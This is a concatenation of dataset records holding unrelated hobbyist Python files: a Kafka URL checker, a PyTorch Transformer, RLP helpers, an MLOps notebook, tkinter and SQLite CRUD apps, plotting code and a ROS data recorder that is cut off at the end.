checker.s(cfg['url'], cfg['patterns']), name='checker')\n\n\n@app.task\ndef checker(url: str, patterns: List[str]):\n \"\"\"\n periodic task\n :param url: target url\n :param patterns: list of regex\n \"\"\"\n logging.info('start checker')\n status_code, elapsed, results = parse(url, patterns)\n logging.info(\n f'checker results for {url} ({patterns}) status_code: {status_code}, elapsed: {elapsed}, results: {results}.'.format(\n url=url, patterns=patterns, status_code=status_code, elapsed=elapsed, results=results))\n producer = CheckerProducer(kafka_producer_config())\n logging.info('send message')\n producer.send_message(status_code, elapsed, results)\n logging.info('message have been sent')\n","repo_name":"vizir1989/aiven","sub_path":"checker/checker_producer.py","file_name":"checker_producer.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1107912632","text":"import numpy as np\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\nfrom .activations import GELU\n\n\nclass WordEmbedding(nn.Module):\n def __init__(self, vocab_size, d_model):\n \"\"\"\n vocab_size: number of words in the vocabulary\n d_model: model's dimension size\n \"\"\"\n super().__init__()\n self.embed = nn.Embedding(vocab_size, d_model)\n\n def forward(self, x):\n return self.embed(x)\n\n\nclass PositionalEncoding(nn.Module):\n def __init__(self, npos, d_model, sinusoid=True):\n \"\"\"\n npos: number of positions\n d_model: model's dimension size\n \"\"\"\n super().__init__()\n self.d_model = d_model\n self.sinusoid = sinusoid\n if sinusoid:\n pos = torch.arange(0, npos, 1).float()\n index = torch.arange(0, d_model, 1) // 2 * 2\n index = index.float() / d_model\n index = 10000**index\n pe = pos[:, None] / index[None, :]\n pe[:, 0::2] = torch.sin(pe[:, 0::2])\n pe[:, 1::2] = torch.cos(pe[:, 1::2])\n pe = pe[None, :]\n self.register_buffer('pe', pe)\n else:\n self.pe = nn.Parameter(torch.from_numpy(np.float32(np.random.normal(0., 0.02, (1, npos, d_model)))))\n\n def forward(self, x):\n \"\"\"\n x: a tensor of size (batch_size, max_len, d_model)\n \"\"\"\n return x * (self.d_model ** 0.5) + self.pe[:, :x.size(1)]\n\n\ndef get_seq_mask(lens, device):\n mask = torch.arange(0, lens.max(), 1)[None, :].to(device) >= lens[:, None]\n mask = mask[:, None, None, :]\n return mask\n\n\ndef apply_mask(x, mask):\n x.masked_fill_(mask, float('-inf'))\n return x\n\n\ndef get_look_ahead_mask(max_len, device):\n mask = torch.triu(torch.ones(max_len, max_len, dtype=torch.uint8), 1).to(device)\n mask = mask[None, None, ...]\n return mask\n\n\nclass MultiHeadAtt(nn.Module):\n def __init__(self, nheads, d_model, dropout):\n \"\"\"\n nheads: number of heads\n d_model: model's dimension size\n \"\"\"\n assert d_model % nheads == 0, 'd_model must be divisible by nheads'\n super().__init__()\n self.nheads = nheads\n self.d_model = d_model\n self.d_k = d_model // nheads\n\n self.q_linear = nn.Linear(d_model, d_model, bias=False)\n self.v_linear = nn.Linear(d_model, d_model, bias=False)\n self.k_linear = nn.Linear(d_model, d_model, bias=False)\n self.att_drop = nn.Dropout(dropout)\n self.out = nn.Linear(d_model, d_model, bias=False)\n self.drop = nn.Dropout(dropout)\n\n def forward(self, Q, K, V, mask):\n \"\"\"\n Q: tensor of shape (batch_size, max_len, d_model)\n K: tensor of shape (batch_size, max_len, d_model)\n V: tensor of shape (batch_size, max_len, d_model)\n lens: sequence lens for masking\n \"\"\"\n bs = Q.size(0)\n\n q = self.q_linear(Q).view(bs, -1, self.nheads, self.d_k).permute(0, 2, 1, 3)\n k = self.q_linear(K).view(bs, -1, self.nheads, self.d_k).permute(0, 2, 3, 1)\n v = self.q_linear(V).view(bs, -1, self.nheads, self.d_k).permute(0, 2, 1, 3)\n\n score = torch.matmul(q, k) / (self.d_k**0.5)\n score = apply_mask(score, mask)\n score = F.softmax(score, dim=-1)\n score = self.att_drop(score)\n\n outputs = torch.matmul(score, v)\n outputs = outputs.permute(0, 2, 1, 3).contiguous().view(bs, -1, self.d_model)\n outputs = self.out(outputs)\n outputs = self.drop(outputs)\n\n return outputs\n\n\nclass PositionwiseFeedForward(nn.Module):\n def __init__(self, d_model, d_ff, dropout):\n super().__init__()\n self.layers = nn.Sequential(\n nn.Linear(d_model, d_ff),\n GELU(),\n nn.Linear(d_ff, d_model),\n nn.Dropout(dropout)\n )\n\n def forward(self, x):\n return self.layers(x)\n\n\nclass SubLayer(nn.Module):\n def __init__(self, d_model):\n super().__init__()\n self.ln = nn.LayerNorm(d_model)\n\n def forward(self, outputs, inputs):\n return self.ln(outputs + inputs)\n\n\nclass BasicLayer(nn.Module):\n def __init__(self, d_model, nheads, d_ff, dropout):\n super().__init__()\n self.mult_att = MultiHeadAtt(nheads, d_model, dropout)\n self.sub1 = SubLayer(d_model)\n self.ff = PositionwiseFeedForward(d_model, d_ff, dropout)\n self.sub2 = SubLayer(d_model)\n\n def forward(self, q, k, v, mask):\n x = self.sub1(self.mult_att(q, k, v, mask), q)\n x = self.sub2(self.ff(x), x)\n return x\n\n\nclass EncoderLayer(BasicLayer):\n def __init__(self, d_model, nheads, d_ff, dropout):\n super().__init__(d_model, nheads, d_ff, dropout)\n\n def forward(self, x, mask):\n return super().forward(x, x, x, mask)\n\n\nclass BasicDecoderLayer(BasicLayer):\n def __init__(self, d_model, nheads, d_ff, dropout):\n super().__init__(d_model, nheads, d_ff, dropout)\n\n def forward(self, x, mask):\n return super().forward(x, x, x, mask)\n\n\nclass DecoderLayer(BasicLayer):\n def __init__(self, d_model, nheads, d_ff, dropout):\n super().__init__(d_model, nheads, d_ff, dropout)\n self.first_mult_att = MultiHeadAtt(nheads, d_model, dropout)\n self.first_sub = SubLayer(d_model)\n\n def forward(self, x, mask, enc_input, enc_mask):\n outputs = self.first_sub(self.first_mult_att(x, x, x, mask), x)\n outputs = super().forward(outputs, enc_input, enc_input, enc_mask)\n return outputs\n\n\nclass TransformerEncoder(nn.Module):\n def __init__(self, nlayers, d_model, nheads, d_ff, vocab_size, npos, dropout, pos_enc_sinusoid=True, layer_output=False):\n super().__init__()\n self.embed = WordEmbedding(vocab_size, d_model)\n self.pos_enc = PositionalEncoding(npos, d_model, pos_enc_sinusoid)\n self.dropout = nn.Dropout(dropout)\n\n self.layers = nn.ModuleList([\n EncoderLayer(d_model, nheads, d_ff, dropout) for _ in range(nlayers)\n ])\n self.layer_output = layer_output\n\n def forward(self, x, lens):\n outputs = self.embed(x)\n outputs = self.pos_enc(outputs)\n outputs = self.dropout(outputs)\n mask = get_seq_mask(lens, x.device)\n if self.layer_output:\n layer_outputs = []\n for layer in self.layers:\n outputs = layer(outputs, mask)\n if self.layer_output:\n layer_outputs.append(outputs)\n if self.layer_output:\n return layer_outputs, mask\n return outputs, mask\n\n\nclass TransformerDecoder(nn.Module):\n def __init__(self, nlayers, d_model, nheads, d_ff, vocab_size, npos, dropout, pos_enc_sinusoid=True):\n super().__init__()\n self.embed = WordEmbedding(vocab_size, d_model)\n self.pos_enc = PositionalEncoding(npos, d_model, pos_enc_sinusoid)\n self.dropout = nn.Dropout(dropout)\n\n self.layers = nn.ModuleList([\n DecoderLayer(d_model, nheads, d_ff, dropout) for _ in range(nlayers)\n ])\n\n def forward(self, x, enc_input, enc_mask):\n outputs = self.embed(x)\n outputs = self.pos_enc(outputs)\n outputs = self.dropout(outputs)\n mask = get_look_ahead_mask(x.size(1), x.device)\n for layer in self.layers:\n outputs = layer(outputs, mask, enc_input, enc_mask)\n return outputs\n\n\nclass TransformerIndependentDecoder(nn.Module):\n def __init__(self, nlayers, d_model, nheads, d_ff, vocab_size, npos, dropout, pos_enc_sinusoid=True):\n super().__init__()\n self.embed = WordEmbedding(vocab_size, d_model)\n self.pos_enc = PositionalEncoding(npos, d_model, pos_enc_sinusoid)\n self.dropout = nn.Dropout(dropout)\n\n self.layers = nn.ModuleList([\n BasicDecoderLayer(d_model, nheads, d_ff, dropout) for _ in range(nlayers)\n ])\n\n def forward(self, x):\n outputs = self.embed(x)\n outputs = self.pos_enc(outputs)\n outputs = self.dropout(outputs)\n mask = get_look_ahead_mask(x.size(1), x.device)\n for layer in self.layers:\n outputs = layer(outputs, mask)\n return outputs\n\n\nclass Transformer(nn.Module):\n def __init__(self, nlayers, d_model, nheads, d_ff, src_vocab_size, tgt_vocab_size, npos, dropout):\n super().__init__()\n self.encoder = TransformerEncoder(nlayers, d_model, nheads, d_ff, src_vocab_size, npos, dropout)\n self.decoder = TransformerDecoder(nlayers, d_model, nheads, d_ff, tgt_vocab_size, npos, dropout)\n self.out = nn.Linear(d_model, tgt_vocab_size)\n\n def forward(self, src, src_lens, tgt):\n outputs, mask = self.encoder(src, src_lens)\n outputs = self.decoder(tgt, outputs, mask)\n outputs = self.out(outputs)\n return outputs\n\n\nclass LinearDecoder(nn.Module):\n def __init__(self, in_features=None, out_features=None, weights=None, bias=None):\n super().__init__()\n if weights is not None:\n self.register_parameter('weight', weights)\n else:\n self.register_parameter('weight', nn.Parameter(torch.Tensor(in_features, out_features)))\n if bias is not None:\n self.register_parameter('bias', bias)\n else:\n self.register_parameter('bias', nn.Parameter(torch.Tensor(out_features)))\n\n def forward(self, x):\n return torch.nn.functional.linear(x, self.weight, self.bias)\n","repo_name":"trungtrinh44/transformer","sub_path":"pytorch/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":9423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31923398702","text":"import abc\nimport struct\n\n\nclass Atomic(object):\n\n \"\"\"ABC for objects that can be RLP encoded as is.\"\"\"\n __metaclass__ = abc.ABCMeta\n\n\nAtomic.register(str)\nAtomic.register(bytearray)\nAtomic.register(unicode)\n\nstr_to_bytes = bytes_to_str = str\nascii_chr = chr\n\n\ndef int_to_big_endian(value):\n cs = []\n while value > 0:\n cs.append(chr(value % 256))\n value /= 256\n s = ''.join(reversed(cs))\n return s\n\n\ndef big_endian_to_int(value):\n if len(value) == 1:\n return ord(value)\n elif len(value) <= 8:\n return struct.unpack('>Q', value.rjust(8, '\\x00'))[0]\n else:\n return int(encode_hex(value), 16)\n\n\ndef is_integer(value):\n return isinstance(value, (int, long))\n\n\ndef decode_hex(s):\n if not isinstance(s, (str, unicode)):\n raise TypeError('Value must be an instance of str or unicode')\n return s.decode('hex')\n\n\ndef encode_hex(s):\n if not isinstance(s, (str, unicode)):\n raise TypeError('Value must be an instance of str or unicode')\n return s.encode('hex')\n\n\nsafe_ord = ord\n","repo_name":"vapory-legacy/pyrlp","sub_path":"rlp/utils_py2.py","file_name":"utils_py2.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3832901396","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nget_ipython().system('pip freeze | grep scikit-learn')\n\n\n# In[27]:\n\n\nimport pickle\nimport pandas as pd\nimport numpy as np\nimport datetime\n\n\n# In[3]:\n\n\nwith open('model.bin', 'rb') as f_in:\n dv, lr = pickle.load(f_in)\n\n\n# In[4]:\n\n\ncategorical = ['PUlocationID', 'DOlocationID']\n\ndef read_data(filename):\n df = pd.read_parquet(filename)\n \n df['duration'] = df.dropOff_datetime - df.pickup_datetime\n df['duration'] = df.duration.dt.total_seconds() / 60\n\n df = df[(df.duration >= 1) & (df.duration <= 60)].copy()\n\n df[categorical] = df[categorical].fillna(-1).astype('int').astype('str')\n \n return df\n\n\n# In[30]:\n\n\ndf=read_data('./data/fhv_tripdata_2021-02.parquet')\n\n\n# In[31]:\n\n\ndicts = df[categorical].to_dict(orient='records')\nX_val = dv.transform(dicts)\ny_pred = lr.predict(X_val)\n\n\n# In[32]:\n\n\nprint(y_pred.mean())\n\n\n# In[33]:\n\n\ndf\n\n\n# In[21]:\n\n\nyear = pd.DatetimeIndex(df['pickup_datetime']).year\nmonth = pd.DatetimeIndex(df['pickup_datetime']).month\n\nyear = year.astype(str)\nmonth = month.astype(str)\n\n# df['ride_id'] = f'2021/02_' + df.index.astype('str')\n\n\n# In[52]:\n\n\ndf[\"ride_id\"]=df.apply(lambda x: f'{x.pickup_datetime.year}/{x.pickup_datetime.month}_'+str(x.name),axis=1)\n\n\n# In[54]:\n\n\ndf[\"pred\"]=y_pred\n\n\n# In[55]:\n\n\ndf\n\n\n# In[60]:\n\n\ndf[[\"ride_id\",\"pred\"]].to_parquet(\n 'output_file.parquet',\n engine='pyarrow',\n compression=None,\n index=False\n)\n\n\n# In[63]:\n\n\nget_ipython().system(' jupyter nbconvert --to python starter.ipynb')\n\n\n# In[64]:\n\n\nget_ipython().system(' pip install pipenv')\n\n\n# Hashes\n\n# \"scikit-learn\": {\n# \"hashes\": [\n# \"sha256:0403ad13f283e27d43b0ad875f187ec7f5d964903d92d1ed06c51439560ecea0\",\n# \"sha256:102f51797cd8944bf44a038d106848ddf2804f2c1edf7aea45fba81a4fdc4d80\",\n# \"sha256:22145b60fef02e597a8e7f061ebc7c51739215f11ce7fcd2ca9af22c31aa9f86\",\n# \"sha256:33cf061ed0b79d647a3e4c3f6c52c412172836718a7cd4d11c1318d083300133\",\n\n# In[ ]:\n\n\n\n\n","repo_name":"murathansygl/MLOpsZoomCamp","sub_path":"starter.py","file_name":"starter.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"15812238048","text":"from multiprocessing import JoinableQueue, Process\n\nfrom ojo.workers import rar\n\nfrom ojo.config import config\n\nif __name__ == \"__main__\":\n print(\"START\")\n if not rar.is_installed():\n print(\"RAR is not installed on system! \")\n exit(-1)\n\n work_q = JoinableQueue()\n done_q = JoinableQueue()\n error_q = JoinableQueue()\n\n this_config = config.load()\n ps = [\n Process(\n name=\"p-%d\" % i,\n target=rar.rar_worker,\n args=(this_config, \"w-%d\" % i, work_q, done_q, error_q))\n for i in range(3)\n ]\n for p in ps:\n p.daemon = True\n p.start()\n for i in range(10):\n work_q.put(\"job-%d\" % i)\n\n for p in ps:\n work_q.put(None)\n\n for i in range(10):\n print(done_q.get())\n done_q.task_done()\n\n print(\"done q join\")\n done_q.join()\n print(\"work q join\")\n work_q.join()\n print(\"error q join\")\n error_q.join()\n\n for p in ps:\n print(\"process join\")\n p.join(1)\n print(\"joined\")\n","repo_name":"ofreshy/ojo","sub_path":"ojo/app/rar_checker.py","file_name":"rar_checker.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18178041935","text":"\"\"\"\ninput :\n4 1\n\noutput :\n5\n\"\"\"\n\nimport sys\n\nsys.stdin = open(\"input.txt\", \"r\")\ninput = sys.stdin.readline\nMOD = 10**9 + 7\n\nHIGH, S = map(int, input().rstrip().split())\ndp = [0 for _ in range(HIGH + 5)]\ndp[1] = 1\ndp[2] = 1\ndp[3] = 2\ndp[4] = 4\nfor i in range(3, HIGH + 1):\n if i % 2 == 1:\n dp[i] = 2 * dp[i - 1] + 1\n else:\n dp[i] = dp[i - 2] + 4 ** (i // 2 - 1)\n\nif HIGH % 2 != S % 2:\n print(dp[HIGH] % MOD)\nelse:\n print((dp[HIGH] - 1) % MOD)\n","repo_name":"AlphaTechnic/SOGANG_ICPC_training_day","sub_path":"2021-05-22/21320.py","file_name":"21320.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14478947686","text":"import tkinter as tk\nfrom tkinter import messagebox\nimport ttkbootstrap as ttk\nimport sys\nfrom conexao import Conexao\nsys.path.insert(0, './')\nsys.path.insert(0, './controller')\nfrom controller import usuario\n\nclass MeusDados:\n def __init__(self, master, id_usuario_logado,id):\n self._janela = master\n self.usuario = id_usuario_logado\n self._janela.title('Gestão Fácil/Dados do Usuário')\n self._janela.geometry('800x500')\n self.id = id\n\n self.frame_dados = ttk.Frame(self._janela)\n self.frame_dados.pack(expand=True)\n \n self._lbl_nome_usuario = ttk.Label(self.frame_dados, text='Meus Dados', font='Helvetica 18 bold')\n self._lbl_nome_usuario.grid(row=0, column=1, columnspan=3, pady=20)\n\n nome_label = ttk.Label(self.frame_dados, text=\"Nome:\", width=20)\n nome_label.grid(row=1, column=1, padx=10, pady=5, columnspan=1)\n self.nome_entry = ttk.Entry(self.frame_dados, width=50, bootstyle=\"success-primary\")\n self.nome_entry.grid(row=2, column=1, columnspan=3, padx=10, pady=5, sticky=\"w\")\n\n email_label = ttk.Label(self.frame_dados, text=\"E-mail:\", width=20)\n email_label.grid(row=3, column=1, padx=10, pady=5, columnspan=1)\n self.email_entry = ttk.Entry(self.frame_dados, width=50, bootstyle=\"success-primary\")\n self.email_entry.grid(row=4, column=1, columnspan=2, padx=10, pady=5, sticky=\"w\")\n\n self.preencher_campos()\n\n atualizar_botao = ttk.Button(self.frame_dados, text=\"Atualizar\", command=self.atualizar_informacoes, width=15, bootstyle=\"success-outline\")\n atualizar_botao.grid(row=5, column=1, pady=10, columnspan=4)\n\n voltar_botao = ttk.Button(self.frame_dados, text=\"Voltar\", command=self.voltar, width=10, bootstyle=\"success-primary\")\n voltar_botao.grid(row=6, column=1, pady=10, columnspan=4)\n\n def preencher_campos(self):\n # Preencha os campos Entry com os dados do usuário\n self.nome_entry.insert(0, self.usuario._nome) # Use _nome aqui\n self.email_entry.insert(0, self.usuario._email)\n\n def atualizar_informacoes(self):\n novo_nome = self.nome_entry.get()\n novo_email = self.email_entry.get()\n sql = f'''UPDATE usuarios SET nome = '{novo_nome}', email = '{novo_email}' WHERE id = {self.id};'''\n Conexao.atualizar(sql)\n messagebox.showinfo('Sucesso',\"Atualização realizada com sucesso!!\")\n\n\n \n def voltar(self):\n self._janela.destroy() # Fecha a janela atual\n\n","repo_name":"sthefanySF/gestao-financeira","sub_path":"view/dadosUsuario.py","file_name":"dadosUsuario.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28923932949","text":"import matplotlib.pyplot as plt\nimport numpy as np\nplt.switch_backend('agg')\nimport seaborn as sns\n\nnum_name = [ 'host_response_rate', 'host_acceptance_rate', 'host_listings_count', 'host_total_listings_count', 'accommodates', 'bedrooms', 'beds', \n'minimum_nights_avg_ntm', 'maximum_nights_avg_ntm', 'availability_30', 'availability_60', 'availability_90', 'availability_365',\n'number_of_reviews', 'number_of_reviews_ltm', 'number_of_reviews_l30d', 'review_scores_rating', 'review_scores_accuracy',\n'review_scores_cleanliness', 'review_scores_checkin', 'review_scores_communication', 'review_scores_location', 'review_scores_value',\n'calculated_host_listings_count', 'calculated_host_listings_count_entire_homes', 'calculated_host_listings_count_private_rooms',\n'reviews_per_month', 'amenities']\ncat_name = ['host_is_superhost', 'neighbourhood_cleansed', 'property_type', 'room_type', 'instant_bookable', \n'bathrooms_text', 'host_identity_verified', 'host_response_time']\n\nclass Visualize:\n def __init__(self):\n pass\n \n def check_num_corr(self,df):\n\n # Check the correlation between numeric variables\n plt.figure(figsize = (20, 20))\n sns.heatmap(df[num_name].corr(), annot = True, cmap=\"YlGnBu\")\n plt.title(\"Correlation Matrix\", fontsize = 30)\n plt.savefig(\"Figure/correlation.png\")\n plt.close()\n # compute the correlation matrix\n corr_matrix = df[num_name].corr()\n\n # find the indices of the highly correlated variables\n high_corr_indices = np.where(abs(corr_matrix) > 0.8)\n\n # print the highly correlated variables\n for i in range(len(high_corr_indices[0])):\n if high_corr_indices[0][i] < high_corr_indices[1][i]:\n print(f\"{df[num_name].columns[high_corr_indices[0][i]]} and {df[num_name].columns[high_corr_indices[1][i]]} are highly correlated with a coefficient of {corr_matrix.iloc[high_corr_indices[0][i], high_corr_indices[1][i]]}.\")\n \"\"\"Drop certain columns using 0.8 as threshold\nDrop reviews_per_month because it is highly correlated with numer_of_reviews, number_of_reviews_ltm, number_of_reviews_l30d\n\nDrop calculated_host_listing_count because it is highly correlated with calculated_host_listing_count_private_homes\n\nDrop beds and bedroom because they are highly correlated with accommodates\n\nDrop availability_60 and availability_90.\n\nreview_scores_rating, review_scores_accuracy\"\"\"\n\n\n def distri_num_col(self,df):\n # Visualize using scatter plot and box plot\n df_num_name = df[num_name]\n for col in num_name:\n # Box plot\n sns.histplot(x=col, data=df_num_name)\n plt.title(f'{col.capitalize()} vs Price')\n plt.savefig(f\"Figure/distribution_num_col/col_{col}.png\")\n plt.close()\n \n \n \n def visual_num_col(self,df):\n # Visualize using scatter plot and box plot\n df_num_name = df[num_name + ['price']]\n for col in num_name:\n # Box plot\n sns.scatterplot(x=col, y='price', data=df_num_name)\n plt.title(f'{col.capitalize()} vs Price')\n plt.savefig(f\"Figure/corr_num_col/col_{col}.png\")\n plt.close()\n \n\n def visual_cat_col(self,df):\n # Create a new dataframe with only the selected columns\n df_cat_name = df[cat_name + ['price']]\n\n # Visualize using scatter plot and box plot\n for col in cat_name:\n # Box plot\n sns.boxplot(x=col, y='price', data=df_cat_name)\n plt.xticks(rotation=90)\n plt.title(f'{col.capitalize()} vs Price')\n plt.savefig(f\"Figure/corr_cat_col/col_{col}.png\")\n plt.close()","repo_name":"joew75123/DATA240-Project","sub_path":"Visualize.py","file_name":"Visualize.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25385805475","text":"import sqlite3\nfrom sqlite3 import Error\n\ndef select_all():\n sql=\"SELECT * from tb_livro\"\n try:\n cur.execute(sql)\n registros = cur.fetchall()\n print(\"Consultando todos: \")\n for elemento in registros:\n print(elemento)\n print(\"Total de registros: \", len(registros))\n except Error as e:\n print('Mensagem de erro do select_all:')\n print(e)\n\ndef insert_one():\n sql=\"insert into tb_livro(titulo, autor, preco, ano) values(?, ?, ?, ?)\"\n p_titulo = input(\"Título: \")\n p_autor = input(\"Autor: \")\n p_preco = input(\"Preço: \")\n p_ano = input(\"Ano [aaaa/mm/dd]: \")\n try:\n cur.execute(sql, (p_titulo, p_autor, p_preco, p_ano))\n conexao.commit()\n print(\"One record added successfully\")\n except Error as e:\n print('Mensagem de erro no insert_one:')\n print(e)\n conexao.rollback()\n\ndef update_one():\n sql=\"update tb_livro set autor=? where titulo=?\"\n autor = input(\"Novo autor: \")\n p_titulo = input(\"Título: \")\n try:\n cur.execute(sql, (autor, p_titulo))\n conexao.commit()\n except Error as e:\n print('Mensagem de erro no update_one: ')\n print(e)\n conexao.rollback()\n\ndef delete_one():\n sql=\"delete from tb_livro where titulo=?\"\n try:\n n=input(\"Título da exclusão: \")\n cur.execute(sql,(n,))\n conexao.commit()\n except Error as e:\n print(\"Mensagem de erro no delete_one\")\n print(e)\n conexao.rollback()\n\nif __name__ == '__main__':\n database = 'livros.db'\n conexao=sqlite3.connect(database)\n try:\n cur = conexao.cursor()\n cur.execute('''create table if not exists tb_livro(\n pk_idt integer primary key autoincrement,\n titulo text not null unique,\n autor text not null,\n preco float,\n ano text)\n ''')\n conexao.commit()\n except Error as e:\n print('Mensagem de erro no main: ')\n print(e)\n conexao.rollback()\n cur.close()\n conexao.close()\n exit(0)\n while True:\n opcao = int(\n input(\"[1] insert one\\n[2] select all\\n[3] update one\\n[4] delete one\\n[5] select one\\n[6] drop table \\n[0] sair\\nopção: \"))\n if opcao == 1:\n insert_one()\n elif opcao == 2:\n select_all()\n elif opcao == 3:\n update_one()\n elif opcao == 4:\n delete_one()\n elif opcao == 6:\n cur.execute('drop table tb_livro')\n print(\"Drop table....\")\n break","repo_name":"manot13/Python","sub_path":"CRUDlivrariaComSQL.py","file_name":"CRUDlivrariaComSQL.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69922148947","text":"#!/usr/bin/env python3\n\n# general packages\nfrom math import nan\nfrom threading import current_thread\nimport time\nimport numpy as np\nimport csv\nimport os\nimport sys\nimport math\nimport re\nfrom rosgraph_msgs.msg import Clock\nfrom rospy.core import traceback\nimport rostopic\nimport rospkg\nimport subprocess\nfrom datetime import datetime\nimport rosparam\nimport yaml\n\n# ros packages\nimport rospy\nfrom std_msgs.msg import Int16\nfrom geometry_msgs.msg import Pose2D, Pose, PoseWithCovarianceStamped\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import LaserScan\nfrom nav_msgs.msg import Odometry\n\n# for transformations\nfrom tf.transformations import euler_from_quaternion\n\n\nclass DataCollector:\n def __init__(self, topic):\n topic_callbacks = [\n (\"scan\", self.laserscan_callback),\n (\"odom\", self.odometry_callback),\n (\"cmd_vel\", self.action_callback),\n ]\n\n try:\n callback = lambda msg: [t[1] for t in topic_callbacks if t[0] == topic[1]][0](msg)\n except:\n traceback.print_exc()\n return\n\n self.full_topic_name = topic[1]\n self.data = None\n\n print(topic[0])\n\n self.subscriber = rospy.Subscriber(topic[0], topic[2], callback)\n\n def episode_callback(self, msg_scenario_reset):\n print(msg_scenario_reset)\n \n self.data = msg_scenario_reset.data\n\n def laserscan_callback(self, msg_laserscan: LaserScan):\n self.data = [msg_laserscan.range_max if math.isnan(val) else round(val, 3) for val in msg_laserscan.ranges]\n\n def odometry_callback(self, msg_odometry: Odometry):\n pose3d = msg_odometry.pose.pose\n twist = msg_odometry.twist.twist\n\n self.data = {\n \"position\": [\n round(val, 3) for val in [\n pose3d.position.x,\n pose3d.position.y,\n euler_from_quaternion(\n [\n pose3d.orientation.x, \n pose3d.orientation.y,\n pose3d.orientation.z,\n pose3d.orientation.w\n ]\n )[2]\n ]\n ],\n \"velocity\": [\n round(val, 3) for val in [\n twist.linear.x,\n twist.linear.y,\n twist.angular.z\n ]\n ]\n }\n\n def action_callback(self, msg_action: Twist): # variables will be written to csv whenever an action is published\n self.data = [\n round(val, 3) for val in [\n msg_action.linear.x,\n msg_action.linear.y,\n msg_action.angular.z\n ]\n ]\n\n def get_data(self):\n return (\n self.full_topic_name,\n self.data \n )\n\n\nclass Recorder:\n def __init__(self):\n self.model = rospy.get_param(os.path.join(rospy.get_namespace(), \"model\"), \"\")\n\n self.dir = rospkg.RosPack().get_path(\"arena-evaluation\")\n self.result_dir = os.path.join(self.dir, \"data\", datetime.now().strftime(\"%d-%m-%Y_%H-%M-%S\")) + \"_\" + rospy.get_namespace().replace(\"/\", \"\")\n\n try:\n os.mkdir(self.result_dir)\n except:\n pass\n \n self.write_params()\n\n topics_to_monitor = self.get_topics_to_monitor()\n\n topics = rostopic.get_topic_list()\n published_topics = topics[0]\n\n topic_matcher = re.compile(f\"{rospy.get_namespace()}({'|'.join([t[0] for t in topics_to_monitor])})$\")\n\n topics_to_sub = []\n\n for t in published_topics:\n topic_name = t[0]\n\n match = re.search(topic_matcher, topic_name)\n\n if not match: \n continue\n\n print(match, t, topic_matcher, match.group())\n\n topics_to_sub.append([topic_name, *self.get_class_for_topic_name(topic_name)])\n\n # topics_to_sub.append([topic_name, *[t for t in topics_to_monitor if t[0] == match.group()][0]])\n\n self.data_collectors = []\n\n for topic in topics_to_sub:\n self.data_collectors.append(DataCollector(topic))\n self.write_data(\n topic[1], [\n \"time\", \"data\"\n ],\n mode=\"w\"\n )\n\n self.write_data(\"episode\", [\"time\", \"episode\"], mode=\"w\")\n self.write_data(\"start_goal\", [\"episode\", \"start\", \"goal\"], mode=\"w\")\n\n self.current_episode = 0\n\n self.config = self.read_config()\n\n self.clock_sub = rospy.Subscriber(\"/clock\", Clock, self.clock_callback)\n self.scenario_reset_sub = rospy.Subscriber(\"/scenario_reset\", Int16, self.scenario_reset_callback)\n\n self.current_time = None\n\n print(rosparam.print_params(\"\", \"/\"))\n\n def scenario_reset_callback(self, data: Int16):\n self.current_episode = data.data\n\n def clock_callback(self, clock: Clock):\n current_simulation_action_time = clock.clock.secs * 10e9 + clock.clock.nsecs\n\n if not self.current_time:\n self.current_time = current_simulation_action_time\n\n time_diff = (current_simulation_action_time - self.current_time) / 1e6 ## in ms\n\n if time_diff < self.config[\"record_frequency\"]:\n return\n\n self.current_time = current_simulation_action_time\n\n for collector in self.data_collectors:\n topic_name, data = collector.get_data()\n \n self.write_data(topic_name, [self.current_time, data])\n \n self.write_data(\"episode\", [self.current_time, self.current_episode])\n self.write_data(\"start_goal\", [\n self.current_episode, \n rospy.get_param(rospy.get_namespace() + \"start\", [0, 0, 0]), \n rospy.get_param(rospy.get_namespace() + \"goal\", [0, 0, 0])\n ])\n\n def read_config(self):\n with open(self.dir + \"/data_recorder_config.yaml\") as file:\n return yaml.safe_load(file)\n\n def get_class_for_topic_name(self, topic_name):\n if \"/scan\" in topic_name:\n return [\"scan\", LaserScan]\n if \"/odom\" in topic_name:\n return [\"odom\", Odometry]\n if \"/cmd_vel\" in topic_name:\n return [\"cmd_vel\", Twist]\n\n def get_topics_to_monitor(self):\n return [\n (\"scan\", LaserScan),\n (\"scenario_reset\", Int16),\n (\"odom\", Odometry),\n (\"cmd_vel\", Twist)\n ]\n\n def write_data(self, file_name, data, mode=\"a\"):\n with open(f\"{self.result_dir}/{file_name}.csv\", mode, newline = \"\") as file:\n writer = csv.writer(file, delimiter = ',')\n writer.writerow(data)\n file.close()\n \n def write_params(self):\n with open(self.result_dir + \"/params.yaml\", \"w\") as file:\n yaml.dump({\n \"model\": self.model,\n \"map_file\": rospy.get_param(\"/map_file\", \"\"),\n \"scenario_file\": rospy.get_param(\"/scenario_file\", \"\"),\n \"local_planner\": rospy.get_param(rospy.get_namespace() + \"local_planner\"),\n \"agent_name\": rospy.get_param(rospy.get_namespace() + \"agent_name\", \"\"),\n \"namespace\": rospy.get_namespace().replace(\"/\", \"\")\n }, file)\n\n\nif 